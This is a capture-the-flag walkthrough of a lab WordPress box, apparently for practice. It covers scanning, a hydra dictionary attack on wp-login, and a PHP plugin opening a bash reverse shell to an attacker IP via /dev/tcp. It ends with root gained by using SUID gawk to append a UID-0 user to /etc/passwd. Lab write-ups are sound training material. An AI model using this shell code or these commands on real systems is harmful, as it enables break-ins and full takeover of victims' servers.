Skip to main content

BadPlugin

export TARGET_IP=192.168.1.100
sudo nmap -Pn -sS -p- $TARGET_IP
PortStateService
80/tcpopenhttp

Directory and File Enumeration

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x txt,php,bak,db,py,html,js,jpg,png,git,sh -t 200 --random-agent --no-state -d 10

Key Findings:

  • http://192.168.1.100/wordpress/
  • http://192.168.1.100/wordpress/wp-login.php

Hostname Resolution

  • To facilitate access to the target using its intended hostname, we added an entry to the local /etc/hosts file.
  • The hostname was shown in the url when I tried to access to the paths found.
echo "$TARGET_IP   escolares.dl" | sudo tee -a /etc/hosts

Vulnerability Scanning

wpscan --url http://escolares.dl/wordpress/ --enumerate p,t,u

This will scan the site for vulnerabilities, and enumerate the plugins, themes and users.

Key Findings:

  • XML-RPC is enabled: http://escolares.dl/wordpress/xmlrpc.php
  • WordPress theme: astra (outdated)
  • Plugins: astra-sites, elementor (both outdated)
  • User: admin

Authentication Bypass Attempt

  • Previous scan told us that the username admin is accepted. However, the password could not be immediately determined.

  • We will use hydra or a similar tool to perform a dictionary attack against the WordPress login page, specifically targeting the "admin" user.

    • We inspected the login form's POST request using the browser's Network panel. The following data was observed in the request body: 
      log=admin&pwd=sadasd&wp-submit=Acceder&redirect_to=http%3A%2F%2Fescolares.dl%2Fwordpress%2Fwp-admin%2F&testcookie=1
    • The corresponding error message on an invalid password attempt was: "la contraseña que has introducido para el nombre de usuario".
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -vV -t 4 $TARGET_IP http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Acceder&redirect_to=http%3A%2F%2Fescolares.dl%2Fwordpress%2Fwp-admin%2F&testcookie=1:la contraseña que has introducido"

Results:

  • Successful login with admin:rockyou

Reverse Shell Plugin

warning

Pay special attention to the IP of the victim machine.. In my case is 192.168.1.100. That's the reason I am using 192.168.1.1 as my attacker IP. Check ifconfig. It is important to be inside the same network.

Set up a Netcat Listener

nc -lvnp 4444

Create and Upload a Malicious Plugin:

shell.php
<?php
/*
Plugin Name: Dirty Plugin
Description: Activate Plugin and get Reverse Shell.
Version: 1
Author: B0end
*/

# Change values if necessary
define('ATTACKER_IP', '192.168.1.1'); 
define('ATTACKER_PORT', 4444);

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Construct the reverse shell command
$command = sprintf(
    "bash -c '/bin/bash -i >& /dev/tcp/%s/%d 0>&1'",
    ATTACKER_IP,
    ATTACKER_PORT
);

// Execute the command and check for errors
$result = system($command, $returnCode);

// Basic error handling
if ($returnCode !== 0) {
    echo "Error executing reverse shell command. Return code: " . $returnCode . "<br>";
    if ($result === false) {
        echo "system() function call failed.<br>";
    }
}
?>
zip -r shell.zip shell.php

Upload and activate the plugin via the WordPress admin panel (you also can activate going to http://escolares.dl/wordpress/wp-content/plugins/shell/shell.php).

Privilege Escalation

Identifying SUID/SGID Binaries

Our initial step involves searching for binaries that have the SUID (Set User ID) or SGID (Set Group ID) permission bits set. These special permissions allow a user to execute a file with the privileges of the file's owner or group, respectively. Misconfigured SUID/SGID binaries can be potential avenues for privilege escalation.

We use the find command to locate these binaries:

find / -perm -u=s -type f 2>/dev/null    # SUID binaries
find / -perm -g=s -type f 2>/dev/null    # SGID binaries

Explanation of find options:

  • /: Specifies the root directory as the starting point for the search.
  • -perm -u=s: Searches for files with the SUID permission bit set.
  • -perm -g=s: Searches for files with the SGID permission bit set.
  • -type f: Limits the search to regular files only.
  • 2>/dev/null: Redirects any error messages (e.g., "Permission denied") to /dev/null, suppressing them from the output.

Notable Finding:

  • /usr/bin/gawk

The gawk binary has the SUID bit set and is owned by root. This indicates that when executed by any user, gawk will run with root privileges. We can potentially exploit this to gain root access.

Exploiting gawk to Add a Root User

We can leverage gawk's capabilities to manipulate the /etc/passwd file, which stores user account information. Specifically, we'll append a new user with root-level privileges (UID 0 and GID 0) to this file.

Steps:

  1. Generate a Password Hash:

    First, we generate a strong password hash using the mkpasswd utility with the SHA-512 algorithm:

    mkpasswd -m sha-512

    The tool will prompt you to enter your desired password. Important: Remember to replace your_generated_hash in the subsequent command with the actual hash generated in this step.

  2. Append User to /etc/passwd using gawk:

    Next, we use the following gawk command to append a new user named b0end with root privileges to the /etc/passwd file:

    gawk -v user="b0end" -v hash='your_generated_hash' 'BEGIN {FS=OFS=":"; print "b0end:" hash ":0:0:root user:/root:/bin/bash" >> "/etc/passwd"; exit}'

    Explanation:

    • gawk -v user="b0end" -v hash='your_generated_hash': Invokes gawk and defines two variables: user (set to the desired username "b0end") and hash (set to the password hash generated in the previous step).
    • 'BEGIN {FS=OFS=":"}: Sets the input and output field separators to a colon (:) for parsing the /etc/passwd file format.
    • print "b0end:" hash ":0:0:root user:/root:/bin/bash": Constructs a new line in the /etc/passwd format, specifying the username, password hash, UID (0), GID (0), a comment, home directory, and the default shell.
    • >> "/etc/passwd": Appends this newly constructed line to the end of the /etc/passwd file, adding the new user without modifying existing entries.
    • exit: Immediately terminates gawk after appending the line.

  3. Verify and Log In:

    After executing the gawk command, the new root user b0end is added to the system. You can now log in as b0end using the password you set during hash generation. For example, you can use the su command to switch to the b0end user:

    su - b0end

    You will be prompted to enter the password you set for the b0end user. After successful authentication, running the id command will confirm that you have root privileges:

    id
    > uid=0(b0end) gid=0(root) groups=0(root)